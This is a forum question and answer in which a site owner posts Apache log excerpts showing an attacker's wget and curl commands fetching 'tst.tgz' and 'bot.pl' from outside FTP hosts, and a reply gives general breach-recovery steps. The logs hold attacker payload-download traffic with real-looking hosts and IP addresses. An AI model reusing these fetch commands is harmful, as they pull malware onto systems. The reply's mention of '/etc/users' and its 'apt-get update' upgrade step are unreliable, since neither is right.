Apache log has things I don't recognize that look dangerous

Question

My site host disabled my account after I exceeded my bandwidth. This was odd, since the site is small. I started looking into the logs and while I'm used to seeing attempts to find common endpoints that I don't have, I saw a couple things that were very troubling. First:

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                             Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 77597  100 77597    0     0   184k      0 --:--:-- --:--:-- --:--:--  246k
--2019-10-13 11:49:21--  ftp://matei:*password*@tyger.ignorelist.com/tst.tgz
       => `tst.tgz'
Resolving tyger.ignorelist.com... 86.121.73.246
Connecting to tyger.ignorelist.com|86.121.73.246|:21... connected.
Logging in as matei ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> SIZE tst.tgz ... 21765
==> PASV ... done.    ==> RETR tst.tgz ... done.

 0K .......... .......... .                                53.3K=0.4s

2019-10-13 11:49:23 (53.3 KB/s) - `tst.tgz' saved [21765]

and

I've never seen these things. I think I've been taken over somehow. How do I fix it?

curl: (7) couldn't connect to host

curl: (7) couldn't connect to host
Can't open perl script "bot.pl": No such file or directory
Can't open perl script "bot.pl": No such file or directory
sh: GET: command not found
sh: GET: command not found
--2019-10-15 22:14:04--  ftp://94.177.240.65/bot.pl
       => `bot.pl'
Connecting to 94.177.240.65:21... --2019-10-15 22:14:04--  
ftp://94.177.240.65/bot.pl
       => `bot.pl'
Connecting to 94.177.240.65:21... failed: Connection refused.
failed: Connection refused.

Answer 1

It looks like your Linux machine has been compromised through the Apache service.

How do I fix it?

There is no simple fix, as you need to investigate your whole system for potential breach.

Here are some general suggestions:

• Upgrade Apache to its latest version (via apt-get).
• Upgrade all your packages (sudo apt-get update).
• Upgrade all your web CMS/frameworks which are in use (check for any known vulnerabilities).
• Scan your entire system for any existing vulnerabilities (e.g. malware scanners, antiviruses).
• Scan all your websites for any malwares and shellcode files.

• If you're using PHP:

  • Use a PHP security scanner.
  • Use a Malware scanner for PHP-based websites.
• If you're using shared-hosting, contact the hosting company.
• Check your system for any extra unexpected users (/etc/users) or files (e.g. in /tmp).

• If you've confirmed the breach:

  • Change all the exposed credentials (access keys, passwords, etc.).
  • Save all the evidences in case you need them (IP addresses, logs, infected/malware files).
• After patching your systems, keep monitoring your logs for any further suspicious activity.

If you're not confident with above, contact the IT company which specialize in that.

See also:

• DDoS attack, what is correct process to investigate cause?